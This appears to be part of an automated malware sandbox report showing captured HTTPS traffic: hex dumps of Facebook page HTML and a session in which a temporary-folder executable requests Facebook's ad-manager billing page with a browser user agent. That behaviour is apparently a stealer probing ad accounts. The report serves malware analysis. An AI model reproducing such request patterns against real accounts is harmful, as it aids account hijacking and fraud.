70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e
                                                                                                                                  Data Ascii: ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>
                                                                                                                                  2022-10-17 20:07:22 UTC1560INData Raw: 6c 6f 72 65 72 2d 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 30 78 4d 44 6e 5f 6c 79 35 4a 75 4f 50 61 46 6b 49 61 73 30 50 67 34 52 49 4c 6c 4f 45 70 53 47 42 53 5a 77 6c 6f 48 54 78 4f 5a 42 5f 50 49 70 6c 4f 49 38 39 6c 6b 45 45 5a 78 65 4a 6b 6d 45 74 6a 42 75 44 65 77 7a 39 6e 55 4b 70 63 67 44 67 4d 47 46 77 4f 43 73 42 76 6a 73 39 4a 68 30 33 33 72 76 5a 30 4a 43 4d 4f 39 45 4a 63 37 70 46 55 44 72 49 67 32 59 67 6c 48 4e 35 49 74 46 6b 67 58 74 33 50 69 38 2d 6a 4e 38 77 4c 4c 72 6a 5f 4e 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61
                                                                                                                                  Data Ascii: lorer-delete-manage-cookies&amp;h=AT0xMDn_ly5JuOPaFkIas0Pg4RILlOEpSGBSZwloHTxOZB_PIplOI89lkEEZxeJkmEtjBuDewz9nUKpcgDgMGFwOCsBvjs9Jh033rvZ0JCMO9EJc7pFUDrIg2YglHN5ItFkgXt3Pi8-jN8wLLrj_Ng\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asyncla
                                                                                                                                  2022-10-17 20:07:22 UTC1562INData Raw: 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32
                                                                                                                                  Data Ascii: nofollow\" data-lynx-mode=\"asynclazy\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252
                                                                                                                                  2022-10-17 20:07:22 UTC1563INData Raw: 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 52 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 4b 31 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 78 36 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 49 53 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31
                                                                                                                                  Data Ascii: },1],["__markup_3310c079_0_4_Re",{"__html":"English (US)"},1],["__markup_3310c079_0_5_K1",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_x6",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_IS",{"__html":"Fran\u00e7ais (France)"},1
                                                                                                                                  2022-10-17 20:07:22 UTC1565INData Raw: 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 79 41 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 38 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 41 2b 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f
                                                                                                                                  Data Ascii: 9\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_yA",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_8h",{"__html":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_A+",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_
                                                                                                                                  2022-10-17 20:07:22 UTC1566INData Raw: 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 67 6c 22 5d 2c
                                                                                                                                  Data Ascii: \/\/www.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_gl"],
                                                                                                                                  2022-10-17 20:07:22 UTC1568INData Raw: 62 39 30 31 30 34 34 30 66 39 30 63 37 62 62 63 64 37 65 63 66 31 38 30 61 30 37 34 64 65 39 31 63 31 61 22 2c 22 6b 65 79 49 64 22 3a 31 39 7d 7d 5d 5d 2c 5b 22 50 6c 61 74 66 6f 72 6d 44 69 61 6c 6f 67 43 42 54 53 65 74 74 65 72 22 2c 22 73 65 74 43 42 54 49 6e 46 6f 72 6d 41 6e 64 4c 6f 67 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 32 50 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 32 50 22 7d 2c 22 63 6c 69 65 6e 74 5f 6c 6f 67 67 65 64 5f 6f 75 74 5f 69 6e 69 74 5f 69 6d 70 72 65 73 73 69 6f 6e 22 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c
                                                                                                                                  Data Ascii: b9010440f90c7bbcd7ecf180a074de91c1a","keyId":19}}]],["PlatformDialogCBTSetter","setCBTInFormAndLog",["__elem_835c633a_0_0_2P"],[{"__m":"__elem_835c633a_0_0_2P"},"client_logged_out_init_impression"]],["BrowserPrefillLogging","initContactpointFieldLogging",
                                                                                                                                  2022-10-17 20:07:22 UTC1569INData Raw: 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 5b 22 53 65 72 76 65 72 4a 53 22 5d 2c 5b 22 52 75 6e 22 5d 2c 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 5d 2c 22 63 6f 6e 74 65 78 74 73 22 3a 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 41 36 22 7d 2c 74 72 75 65 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 6b 7a 22 7d 2c 74 72 75 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d
                                                                                                                                  Data Ascii: zaiScuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],["HasteSupportData"],["ServerJS"],["Run"],["InitialJSLoader"]],"contexts":[[{"__m":"__elem_a588f507_0_1_A6"},true],[{"__m":"__elem_a588f507_0_2_kz"},true]]});requireLazy(["Run"]
                                                                                                                                  2022-10-17 20:07:22 UTC1571INData Raw: 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 6c 2f 30 2c 63 72 6f 73 73 2f 44 41 54 67 4a 75 4e 70 65 41 4f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 38 2f 72 2f 5f 4c 6b 4e 5a 50 71 47 52 41 7a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20
                                                                                                                                  Data Ascii: load" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/DATgJuNpeAO.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz" as="script"
                                                                                                                                  2022-10-17 20:07:22 UTC1572INData Raw: 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 73 2f 6c 2f 30 2c 63 72 6f 73 73 2f 70 50 4d 36 64 30 46 6c 62 32 57 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65
                                                                                                                                  Data Ascii: ,cross/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/0,cross/pPM6d0Flb2W.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" hre
                                                                                                                                  2022-10-17 20:07:22 UTC1573INData Raw: 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 45 43 33 61 59 43 6f 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 66 50 54 53 43 49 32 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 76 63 42 63 4a 6a 77 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 45 46 31 68 57 6c 35 22 2c 22 43 6f 33 6e 65 56 64 22 2c 22 4b 41 6a 62 72 6c 2f 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 63 59 55 33 63 33 32 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 59 6f 32 55 7a 4f 68 22 2c 22 4a 2b 2f 67 42 78 6b 22 2c 22
                                                                                                                                  Data Ascii: onsistency:{rev:1006402711}}},allResources:["Z6KNn4Q","hyKmpuu","KhbDqLm","EC3aYCo","xNUAOrF","n6W4xMH","fPTSCI2","+RGtM0o","vcBcJjw","vGt2mxz","jTXdH3e","mRpDwmd","EF1hWl5","Co3neVd","KAjbrl/","ZEC4RrQ","cYU3c32","AcmZ15m","sjCQeza","Yo2UzOh","J+/gBxk","
                                                                                                                                  2022-10-17 20:07:22 UTC1574INData Raw: 31 31 39 32 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                                  Data Ascii: 1192<script nonce="5nQXuWSU">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="5nQXuWSU">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                                                                  2022-10-17 20:07:22 UTC1576INData Raw: 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 30 6c 69 73 66 64 5f 79 44 46 55 72 5a 5a 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                                  Data Ascii: _hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa20lisfd_yDFUrZZ_hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["cr:1083117",[],{
                                                                                                                                  2022-10-17 20:07:22 UTC1577INData Raw: 4b 31 73 47 79 6b 70 74 72 34 41 73 36 58 6f 76 74 44 63 69 61 70 48 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70
                                                                                                                                  Data Ascii: K1sGykptr4As6XovtDciapHA"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,grap
                                                                                                                                  2022-10-17 20:07:22 UTC1578INData Raw: 49 5f 69 70 0d 0a 31 30 61 30 0d 0a 4b 6a 2d 6d 39 74 34 71 41 53 43 65 67 45 47 6a 78 61 57 74 33 5f 6a 72 52 77 75 37 63 6f 57 51 71 4b 49 32 55 55 34 42 68 49 56 63 2d 35 46 6b 4f 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 58 36 59 30 52 48 72 32 52 47 38 57 38 34 37 4a 6f 70 6c 56 35 78 59 65 77 57 51 36 33 78 42 48 2d 6a 37 45 52 52 74 50 31 56 6f 31 46 2d 6d 62 31 5f 75 32 56 74 4e 4b 31 73 47 79 6b 70 74 72 34 41 73 36 58 6f 76 74 44 63 69 61 70 48 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b
                                                                                                                                  Data Ascii: I_ip10a0Kj-m9t4qASCegEGjxaWt3_jrRwu7coWQqKI2UU4BhIVc-5FkOw"]},-1],["cr:983844",[],{__rc:[null,"Aa1X6Y0RHr2RG8W847JoplV5xYewWQ63xBH-j7ERRtP1Vo1F-mb1_u2VtNK1sGykptr4As6XovtDciapHA"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMFork
                                                                                                                                  2022-10-17 20:07:22 UTC1580INData Raw: 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 30 6c 69 73 66 64 5f 79 44 46 55 72 5a 5a 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22
                                                                                                                                  Data Ascii: wNctfG2mt5SHK0ck"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa20lisfd_yDFUrZZ_hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["
                                                                                                                                  2022-10-17 20:07:22 UTC1581INData Raw: 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 2d 72 56 4e 59 39 5f 52 4f 76 55 4d 72 5f 72 35 53 2d 67 77 74 37 4c 4c 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 2d 72 56 4e 59 5f 72 71 72 53 46 31 2d 38 78 4b 57 6a 41 34 6e 55 53 62 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d
                                                                                                                                  Data Ascii: ]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","-rVNY9_ROvUMr_r5S-gwt7LL",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","-rVNY_rqrSF1-8xKWjA4nUSb",63072000000,"/",false,false,true]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  13192.168.2.54971831.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:24 UTC1624OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:24 UTC1625INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
